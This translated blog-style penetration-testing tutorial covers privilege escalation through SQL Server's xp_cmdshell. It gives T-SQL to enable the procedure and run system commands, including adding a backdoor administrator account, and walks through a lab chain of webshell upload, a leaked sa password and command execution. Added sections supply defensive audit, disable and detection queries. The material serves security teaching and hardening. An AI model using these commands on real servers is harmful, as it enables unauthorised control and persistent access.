110. Network security penetration test - [privilege escalation 8] - [Windows SQL Server xp_cmdshell stored procedure privilege escalation]
2022-07-07 11:56:00 【qwsn】
In my view, whether studying security or working in security, one more or less develops some feelings and a sense of mission!!!
One 、Windows SQL Server xp_cmdshell stored procedure privilege escalation
1、Background of xp_cmdshell privilege escalation:
If the website's database is SQL Server and the sa password is obtained, the xp_cmdshell stored procedure can be enabled and system commands run with the privileges of the SQL Server service. These are not necessarily SYSTEM privileges; that depends on the account the administrator chose for the SQL Server service when it was installed.
2、Relevant concepts of xp_cmdshell:
(1) The xp_cmdshell stored procedure 【a stored procedure is a collection of one or more SQL statements precompiled into an executable procedure】 is used to run cmd commands on the local machine and requires sa (sysadmin) privileges. By default, after SQL Server 2005/2008 is installed, the xp_cmdshell stored procedure is disabled; to use it, it has to be enabled:
Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
Serial number | command | notes |
---|---|---|
1 | Exec sp_configure 'show advanced options',1; | # Allow configuration of advanced options |
2 | RECONFIGURE; | # Apply the reconfiguration |
3 | EXEC sp_configure 'xp_cmdshell',1; | # Enable the xp_cmdshell stored procedure |
4 | RECONFIGURE; | # Apply the reconfiguration |
(2) Format for executing system commands:
Serial number | command | notes |
---|---|---|
1 | Exec master.dbo.xp_cmdshell 'whoami' | # View the current user |
2 | Exec master.dbo.xp_cmdshell 'net user' | # View all users |
3 | Exec master.dbo.xp_cmdshell 'systeminfo' | # View OS information |
4 | Exec master.dbo.xp_cmdshell 'net user test 123 /add & net localgroup administrators test /add' | # Add a user to the administrators group |
(3) Disable it again after use: Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0;RECONFIGURE;
Serial number | command | notes |
---|---|---|
1 | Exec sp_configure 'show advanced options',1; | # Allow configuration of advanced options |
2 | RECONFIGURE; | # Apply the reconfiguration |
3 | EXEC sp_configure 'xp_cmdshell',0; | # Disable the xp_cmdshell stored procedure |
4 | RECONFIGURE; | # Apply the reconfiguration |
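From the defender's side, the same sp_configure mechanism is what an administrator uses to audit and lock the option down. The following T-SQL is an added example and is not from the original post: it reports the current state from sys.configurations, disables xp_cmdshell, hides advanced options again, verifies the result, and then searches the current SQL Server error log for the configuration-change message that every sp_configure change writes there. It assumes sysadmin rights on SQL Server 2008 or later; xp_readerrorlog is an undocumented but widely used system procedure.

```sql
-- Added example (not from the original post): audit, disable and verify xp_cmdshell.
-- Assumes sysadmin rights on SQL Server 2008 or later.

-- 1. Report the current state without changing anything.
--    value_in_use = 1 for 'xp_cmdshell' means the procedure is callable right now.
SELECT name, value, value_in_use, is_dynamic
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 2. Disable xp_cmdshell. 'show advanced options' must be on first, otherwise
--    sp_configure reports that the 'xp_cmdshell' option does not exist.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;   -- hide advanced options again
RECONFIGURE;

-- 3. Verify: value_in_use must now be 0 for xp_cmdshell.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- 4. Detection: each sp_configure change is logged as
--    "Configuration option 'xp_cmdshell' changed from 0 to 1 ...".
--    Search the current error log (0) of the SQL Server log type (1) for it,
--    which shows when the option was toggled and is a good thing to alert on.
EXEC master.dbo.xp_readerrorlog 0, 1, N'xp_cmdshell';
```

Checking value_in_use rather than value matters: value is the configured setting, while value_in_use is what the running instance actually enforces, and the two differ until RECONFIGURE has been run.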
3、xp_cmdshell privilege escalation in practice:
(1) Experimental environment:
1. Target:
(1) Virtual machine Windows 2008【target_sys.com】【192.168.97.131】
(2) Scripting language environment: a php/asp runtime is present
2. Attacker:
(1) Virtual machine Win7【192.168.97.130】
(2) Firefox + Burp Suite + AntSword + large webshell
3. Network environment:
(1) NAT network built with VMware
4. Target link:
URL: http://target_sys.com/upload.php
(2) Experimental process:
Step one: Visit the target link, use MIME type spoofing to bypass the whitelist restriction, and upload the up.aspx large webshell.
【The above process is omitted】The privilege escalation process follows:
Step two: Connect to the up.aspx webshell【the password is admin】, click the [File Manager] module, and search for the SQL Server account and password.
Connecting to the webshell:
The usual places where SQL Server connection data is stored are web.config, config.asp, conn.aspx and database.aspx, but in this environment it is actually in index.aspx of a side site (www.demo1.com) on the same server, which stores the sa user password: 123456
Step three: Click the [DataBase] module and connect to MSSQL with the sa account just obtained; at the same time the SQL Server version is found to be 2008.
The xp_cmdshell stored procedure is used to run local cmd commands and requires sa privileges.
Step four: In the SQLExec drop-down box, select the option Add xp_cmdshell(SQL2005) to enable the xp_cmdshell stored procedure.
Step five: Use the newly enabled xp_cmdshell stored procedure to run some system commands with the privileges of the SQL Server service.
Because checking the current permissions shows that it is only an ordinary user, only some basic commands can be run; an exploit-based privilege escalation tool could also be uploaded to raise the current user's privileges further.
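The outcome of step five depends on two things a defender controls: which account the SQL Server service runs as (the privileges xp_cmdshell inherits) and who can reach sysadmin in the first place (here a weak sa password stored in a web page). The following T-SQL is an added example, not from the original post, that checks both: the service account from sys.dm_server_services, the state and policy settings of the sa login from sys.sql_logins, and the current sysadmin membership. It assumes SQL Server 2008 R2 SP1 or later (sys.dm_server_services first appeared there) and VIEW SERVER STATE or sysadmin rights.

```sql
-- Added example (not from the original post): what would an xp_cmdshell call
-- run as, and who can enable it?  Assumes SQL Server 2008 R2 SP1 or later.

-- 1. Service account of the Database Engine. xp_cmdshell runs with this
--    account's Windows privileges when called by a sysadmin, so a
--    low-privileged per-service account limits the damage; LocalSystem or a
--    domain admin account does not.
SELECT servicename, service_account, startup_type_desc, status_desc
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server (%';

-- 2. State of the sa login (always principal_id 1). A disabled sa, or one
--    with the Windows password policy enforced, closes the path used in
--    step three above (sa / 123456 found in a web page).
SELECT name, is_disabled, is_policy_checked, is_expiration_checked
FROM sys.sql_logins
WHERE principal_id = 1;

-- 3. Every member of sysadmin can run sp_configure and enable xp_cmdshell,
--    so this list is the real set of principals that matter.
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS sp ON sp.principal_id = rm.member_principal_id
JOIN sys.server_principals AS r  ON r.principal_id  = rm.role_principal_id
WHERE r.name = 'sysadmin';

-- 4. Hardening, to run only if no application depends on the sa login:
--    ALTER LOGIN sa DISABLE;
-- Applications should connect with a dedicated login that holds only the
-- database permissions they need, so that a leaked connection string in
-- web.config or index.aspx does not hand out sysadmin.
```

If step 2 shows is_disabled = 0 and step 3 shows the application's own login among the sysadmin members, then a single leaked configuration file is enough to reach xp_cmdshell, which is exactly the chain the walkthrough above follows.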